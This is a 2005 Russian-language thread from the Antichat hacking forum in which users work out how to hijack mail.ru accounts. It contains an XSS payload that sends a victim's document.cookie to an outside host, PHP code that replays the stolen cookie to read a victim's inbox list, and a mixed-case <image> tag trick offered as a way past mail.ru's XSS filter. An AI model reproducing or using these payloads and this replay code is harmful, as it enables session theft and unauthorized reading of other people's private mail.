ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Передача cookies
  #1  
Старый 25.03.2005, 00:53
Аватар для Майор
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418

Репутация: 300


Отправить сообщение для Майор с помощью ICQ
По умолчанию Передача cookies

Вот встала у меня такая задача : имея куки допустим c mail.ru мне надо чтоб скрипт(php) передовал куки серверу и дальше лазил по ящику....
Подскажите возможнолт это реализовать ?
 
Ответить с цитированием

  #2  
Старый 25.03.2005, 11:48
Аватар для Майор
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418

Репутация: 300


Отправить сообщение для Майор с помощью ICQ
По умолчанию

мож хоть кто ссылочку даст на описания таких куков ...
 
Ответить с цитированием

  #3  
Старый 25.03.2005, 12:53
Аватар для LittleLamer
LittleLamer
Познающий
Регистрация: 04.11.2004
Сообщений: 44
Провел на форуме:
118909

Репутация: 62
Отправить сообщение для LittleLamer с помощью ICQ
По умолчанию

Да, возможно. Нужно знать либо HTTP протокол, тогда fsockopen() и т.д. Либо юзать setcookie().
Мне более по душе первое
 
Ответить с цитированием

  #4  
Старый 25.03.2005, 17:51
Аватар для Майор
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418

Репутация: 300


Отправить сообщение для Майор с помощью ICQ
По умолчанию

Цитата:
Сообщение от LittleLamer  
Да, возможно. Нужно знать либо HTTP протокол, тогда fsockopen() и т.д. Либо юзать setcookie().
Мне более по душе первое
Это хорошо, что можно
Приведи примерчик плиз!!!
ну например для того же майл ру передаём

Код:
mrcu=C3DC424333243DD60E4D0100007F
Mpopl=1187863386
MailUser=1
 
Ответить с цитированием

  #5  
Старый 25.03.2005, 21:22
Аватар для LittleLamer
LittleLamer
Познающий
Регистрация: 04.11.2004
Сообщений: 44
Провел на форуме:
118909

Репутация: 62
Отправить сообщение для LittleLamer с помощью ICQ
По умолчанию

Например ты почил куки таким (или похожим) способом:
Код:
<img src="javascript:img=new Image();img.src='http://mysite.com/xxx.php?cooki='+escape(document.cookie)">
(для маила это конечно не работает, это для примера)
PHP код:
$cooki=$_GET["cooki"];
$req="GET /cgi-bin/msglist?folder=0 HTTP/1.0\r\nHost: win.mail.ru\r\nReferer: http://win.mai.ru/cgi-bin/msglist?folder=0\r\nCookie: ".$cooki."\r\n\r\n";
$f=fsockopen("win.mail.ru"80);
fwrite($f$req);
$dt="";
while (!
feof($f))
   
$dt.=fread($f1024);
fclose($f); 
Терь в $dt будет содержаться содержимое страницы /cgi-bin/msglist?folder=0 (это список последних писем в папке Входящие)

P.S.: за понятность написанного ответственность нести не хочу

Последний раз редактировалось LittleLamer; 25.03.2005 в 21:24..
 
Ответить с цитированием

  #6  
Старый 25.03.2005, 21:24
Аватар для LittleLamer
LittleLamer
Познающий
Регистрация: 04.11.2004
Сообщений: 44
Провел на форуме:
118909

Репутация: 62
Отправить сообщение для LittleLamer с помощью ICQ
По умолчанию

И ещё. Ты в майле xss какой нить знаешь?
 
Ответить с цитированием

  #7  
Старый 25.03.2005, 23:18
Аватар для Майор
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418

Репутация: 300


Отправить сообщение для Майор с помощью ICQ
По умолчанию

Почти всё нонятно, токо есть несколько вопросов
1) Зачем здесь точки и два перевода строки Cookie: ".$cooki."\r\n\r\n";
2) И здесь зачем точка после $dt.=
Вроде по синтаксису можно без них... или я неправ ?

3) маил ру ща JaVaScRiPt пропускает
 
Ответить с цитированием

  #8  
Старый 26.03.2005, 00:30
Аватар для LittleLamer
LittleLamer
Познающий
Регистрация: 04.11.2004
Сообщений: 44
Провел на форуме:
118909

Репутация: 62
Отправить сообщение для LittleLamer с помощью ICQ
По умолчанию

1) два перевода строки - это спецификация HTTP протокола и означает конец запроса
2)
Код:
$dt.=fread($f, 1024)
это в php означает увеличения строки $dt на прочитанное из сокета $f. Т.е. если точки не было бы, то в конце цикла в $dt хранилось бы не всё содержимое страницы, а только самая последняя часть
3)
Код:
<img src=JaVaScRiPt:alert()>
(JaVaScRiPt "дословно")
mail.ru это не пропускает, уточни плиз
 
Ответить с цитированием

  #9  
Старый 26.03.2005, 01:04
Аватар для Майор
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418

Репутация: 300


Отправить сообщение для Майор с помощью ICQ
По умолчанию

1) а здесть то зачем точки .$cooki. ?

2) тег img на mail.ru всегда фильтровался, а image нет

так вот работает :
<image src=JaVaScRiPt:alert()>
JaVaScRiPt - разными регистрами

Последний раз редактировалось Майор; 26.03.2005 в 01:08..
 
Ответить с цитированием

  #10  
Старый 26.03.2005, 02:46
Аватар для LittleLamer
LittleLamer
Познающий
Регистрация: 04.11.2004
Сообщений: 44
Провел на форуме:
118909

Репутация: 62
Отправить сообщение для LittleLamer с помощью ICQ
По умолчанию

точки - это в php строки складываются
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ